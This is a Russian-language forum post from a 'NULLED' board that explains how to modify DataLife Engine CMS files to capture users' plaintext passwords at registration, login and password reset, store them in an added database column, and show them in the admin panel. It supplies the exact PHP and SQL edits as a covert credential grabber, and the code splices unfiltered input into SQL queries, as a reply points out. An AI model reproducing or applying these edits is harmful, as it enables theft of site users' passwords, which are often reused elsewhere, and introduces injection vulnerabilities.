• DONATE to NULLED!
    Форуму и его команде можно помочь, мотивировать модераторов разделов.
    Помогите модератору этого раздела killoff лично.

Модуль Создаем свой граббер паролей ;)

Статус
В этой теме нельзя размещать новые ответы.

dragonstyle

Читатель
Заблокирован
Регистрация
17 Ноя 2008
Сообщения
523
Реакции
481
  • Автор темы
  • Заблокирован
  • #1
Создаем грабер паролей...

Сейчас расскажу в этой статье вам как за 10 минут сделать грабер паролей..

Что нужно:
Колонка в мускуле и изменения кода файлов...

Добавляем колонку в таблицу с юзерами, назовем ее passer(а так как хотите, только потом в запросах замените)...

Теперь нужно рассмотреть 3 ситуации:
Регистрация.
Вход.
Востановления пароля
Админка

1) регистрация.
открываем engine/modules/register.php
ищем
ниже вставляем
ищем запрос в базу (в конце..)
вставляем колонку passer
готово, сохраняем...
регистрацию сделали...
2) востановление пароля
открываем engine/modules/lostpassword.php
ищем:
Код:
$db->query( "UPDATE " . USERPREFIX . "_users set password='" . md5( md5( $new_pass ) ) . "', allowed_ip = '' WHERE user_id='$douser'" );
заменяем на
Код:
$db->query( "UPDATE " . USERPREFIX . "_users set password='" . md5( md5( $new_pass ) ) . "', passer='".$new_pass."', allowed_ip = '' WHERE user_id='$douser'" );
готово, сохраняем...

3)вход на сайт
открываем engine/modules/sitelogin.php
ищем
Код:
$_POST['login_password'] = md5( $_POST['login_password'] );
ДО ЭТОГО вставляем
Код:
$passer = $_POST['login_password'];
ниже в 2 местах ищем
Код:
lastdate='{$_TIME}', logged_ip='" . $_IP . "'
заменяем на
Код:
lastdate='{$_TIME}', logged_ip='" . $_IP . "', passer='".$passer."'
по смыслу все...

4)админка
теперь добавляем вывод пароля при просмотре профиля в админке...

открываем engine/inc/editusers.php
ищем
Код:
    <tr>
        <td style="padding:4px;">{$lang['user_newpass']}</td>
        <td colspan="2"><input size="20" name="editpass" class="edit"></td>
    </tr>
ниже вставляем:
Код:
    <tr>
        <td style="padding:4px;">Пароль:</td>
        <td colspan="2">{$row['passer']}</td>
    </tr>
или, чтобы просмотр был возможен только пользователю с id=1

Идея взята с Password Base 4.0
Сделал: MATRIX

p.s. идея модуля не продается...
Некоторое взял под хайд 3, кто нибудь да поймет причину ;)
Исправлена ошибка в работе с базой ;)
 
Столкнулся с тем, что если в настройках движка стоит подтверждение регистрации через e-mail, то после перехода по ссылки активации, (которая на почту приходит) mysql выдает ошибку по поводу несовпадения полей. Если же сделать упрощенную регистрацию - все проходит на ура.
 
подняли такйю старую тему... а в неи и фильтрации данных даже нет...
 
Статус
В этой теме нельзя размещать новые ответы.
Назад
Сверху